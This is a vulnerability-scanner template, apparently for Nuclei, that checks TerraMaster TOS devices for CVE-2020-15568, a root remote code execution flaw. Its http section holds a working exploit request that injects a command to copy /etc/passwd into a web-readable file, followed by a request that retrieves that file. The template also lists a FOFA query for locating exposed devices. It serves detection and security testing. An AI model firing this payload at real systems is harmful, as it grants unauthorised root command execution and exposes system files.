id: CVE-2020-15568 info: name: TerraMaster TOS <.1.29 - Remote Code Execution author: pikpikcu severity: critical description: TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade TerraMaster TOS to version 1.29 or higher to mitigate this vulnerability. reference: - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2020-15568 - https://help.terra-master.com/TOS/view/ - https://github.com/divinepwner/TerraMaster-TOS-CVE-2020-15568 - https://github.com/n0bugz/CVE-2020-15568 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-15568 cwe-id: CWE-913 epss-score: 0.93537 epss-percentile: 0.99836 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: terra-master product: tos fofa-query: '"terramaster" && header="tos"' tags: cve2020,cve,terramaster,rce,terra-master,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(4))}}" http: - raw: - | GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - | GET /include/{{filename}}.txt HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4b0a00483046022100db876e0f7df2eab5b40cb9d332ea021cc88f6f6423eb97a45a78e162cd409208022100aacf14f239aba2ca7366d418a6b986cbaf65004141cd63d666c70a930b6a0eb0:922c64590222798bb761d5b6d8e72950